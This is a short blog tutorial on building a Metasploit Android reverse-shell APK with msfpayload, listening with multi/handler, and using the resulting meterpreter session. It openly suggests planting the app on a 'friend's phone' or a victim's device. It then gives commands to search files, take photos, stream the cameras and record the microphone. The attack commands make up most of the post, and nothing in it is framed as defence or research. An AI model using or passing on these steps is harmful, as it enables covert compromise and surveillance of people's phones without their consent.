Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit


When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2


Any Issue or thing you dont understand feel free to comment below ... Thanks 




Load disqus comments

0 komentar

Comments
0 Comments